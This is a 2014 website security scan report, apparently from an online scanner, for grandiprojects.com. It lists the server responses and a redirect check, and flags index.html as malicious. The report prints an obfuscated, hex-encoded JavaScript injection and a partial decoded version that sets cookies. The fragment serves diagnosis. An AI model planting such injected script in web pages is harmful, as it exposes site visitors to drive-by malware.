Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grandiprojects.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grandiprojects.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:19 GMT Location: http://www.grandiprojects.com/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.grandiprojects.com/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 19:17:20 GMT Accept-Ranges: bytes ETag: "dd1a3e6829d0ca1:4a7ac7" Server: Microsoft-IIS/6.0 Content-Length: 12916 Content-Location: http://www.grandiprojects.com/index.html Content-Type: text/html Last-Modified: Tue, 30 Mar 2010 16:52:39 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.grandiprojects.com/index.html | 200 OK Content-Length: 12916 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ayOb;if(ayOb!='' && ayOb!='axAe'){ayOb=''};var iKy;if(iKy!='arBe' && iKy != ''){iKy=null};var diP;var asOr=false;var haKD=false;var esPa=false;diP='797b7b7f7c7f7b7f345064634161727f6022126272216f69556a6e647b533877477f6b233b6b6e357f6c676275767c65307c627b6166697462691c243f7562737a725531212d716d61756778707e107a7e7372162f7f7b6169751b2d61694a477b6d7577373c694d7a6e4b7f782a067e4c77535b6f7c5c29705f616d6b23697678783263694b777e4a7a5963624e24320e256a4771745c7f73425b2c2c312a78797b3479685a Decoded script: function getShort(){};function jInt(){};getShort.prototype = {wordA : function(name, value) {dStatic="dStatic";useFalse=false;this.nsFinalByte="";byteCharC="";var bDDouble="";var d= new Date();this.windowB='';var eNsAs='';d.setTime(new Date().getTime() + 43200000); falseUse="falseUse";var doubleA=false;this.longLetterWord=false;document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); var getStatic=46876;floatKK='';var setFinalSet=new Array();},byteTrueLong : function() function () { letterDoubleSet.byteTrueLong(); } /*** called setTimeout with function () { letterDoubleSet.byteTrueLong(); }, 100 */ getDate</body> Antivirus reports:
| ||
http://titusdevo.com/images/wpThumbnails/352_Archer.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:20 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevelopment.com/ | 200 OK Content-Length: 2701 Content-Type: text/html | clean |
http://titusdevelopment.com/menu/menu.js | 200 OK Content-Length: 8376 Content-Type: application/javascript | clean |
http://titusdevo.com/images/wpThumbnails/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:23 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevelopment.com/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://titusdevo.com/images/wpThumbnails/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:24 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/contracting.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:25 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/consulting.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:25 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/lowell.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/grant.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/newton.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/archer.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:27 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/shoshone.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:27 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/hill.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/martin.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/bryant.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/mills.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:29 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:29 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grandiprojects.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 28 Aug 2014 19:17:19 GMT
Location: http://www.grandiprojects.com/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
GET / HTTP/1.1
Host: grandiprojects.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 28 Aug 2014 19:17:19 GMT
Location: http://www.grandiprojects.com/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grandiprojects.com
Referer: http://www.google.com/search?q=grandiprojects.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grandiprojects.com
Referer: http://www.google.com/search?q=grandiprojects.com
Result:
The result is similar to the first query. There are no suspicious redirects found.